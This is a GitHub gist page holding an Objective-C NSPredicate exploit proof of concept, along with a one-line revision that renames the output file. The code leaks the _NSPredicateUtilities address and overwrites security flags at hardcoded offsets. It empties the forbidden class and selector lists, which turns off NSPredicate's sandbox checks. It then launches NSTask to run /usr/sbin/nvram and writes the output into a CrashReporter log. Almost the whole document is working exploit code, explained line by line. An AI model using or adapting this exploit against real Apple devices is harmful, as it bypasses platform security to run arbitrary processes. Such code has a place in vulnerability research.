Last active
December 30, 2023 06:26
Revisions
-
aemmitt-ns revised this gist
Jul 16, 2022 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -24,4 +24,4 @@ "function(1, 'self', $task.waitUntilExit, " // wrapper function so the undefined results dont cause crash "function($task.standardOutput.fileHandleForReading.availableData, 'writeToFile:atomically:'," // get output from NSTask "'/private/var/mobile/Library/Logs/CrashReporter/nvram.ips', nil))}, 'NSDate')"]; // write to crash log file -
Jul 16, 2022 .There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,27 @@ NSPredicate *pred = [NSPredicate predicateWithFormat:@"1=cast({" // cast to get nice error in syslog for debugging // use format string to read the address of _NSPredicateUtilities ( #self() ), theres prolly a better way "$_NSPredicateUtilities := function('','stringByAppendingFormat:', '%p/%lld', #self()).lastPathComponent.longLongValue," "$_predicateSecurityFlags := $_NSPredicateUtilities + 0x188c," // address of _predicateSecurityFlags "$_predicateSecurityOnce := $_predicateSecurityFlags - 0x276daec," // address of _predicateSecurityOnce "$forbiddenClassesLength := $_predicateSecurityFlags + 0x63a334," // address of length field for array of forbidden classes "$forbiddenSelectorsLength := $_predicateSecurityFlags + 0x63a3d4," // address of length field for array of forbidden selectors "$NSTask := $_NSPredicateUtilities + 0x637860," // address of NSTask class "$NSPipe := $NSTask - 0x41a0," // address of NSPipe class "function(1, 'self'," // wrapper function so the undefined results dont cause crash "function(-1, 'getValue:', $_predicateSecurityOnce.nonretainedObjectValue)," // set _predicateSecurityOnce = -1, no checks "function( 0, 'getValue:', $_predicateSecurityFlags.nonretainedObjectValue)," // set _predicateSecurityFlags = 0, no exceptions "function( 0, 'getValue:', $forbiddenClassesLength.nonretainedObjectValue)," // set length of class name array to 0 "function( 0, 'getValue:', $forbiddenSelectorsLength.nonretainedObjectValue))," // set length of selector array to 0 "$dict := '<dict><key>_NSTaskExecutablePath</key><string>/usr/sbin/nvram</string>" // dict for NSTask "<key>_NSTaskArgumentArray</key><array><string>-p</string></array></dict>'.propertyList," // set _NSTaskOutputFileHandle to a pipe so we can get the output "function($dict, 'setObject:forKey:', $NSPipe.nonretainedObjectValue.pipe, '_NSTaskOutputFileHandle')," "$task := function($NSTask.nonretainedObjectValue, 'launchedTaskWithDictionary:', $dict)," // launch NSTask "function(1, 'self', $task.waitUntilExit, " // wrapper function so the undefined results dont cause crash "function($task.standardOutput.fileHandleForReading.availableData, 'writeToFile:atomically:'," // get output from NSTask "'/private/var/mobile/Library/Logs/CrashReporter/nvramahh.ips', nil))}, 'NSDate')"]; // write to crash log file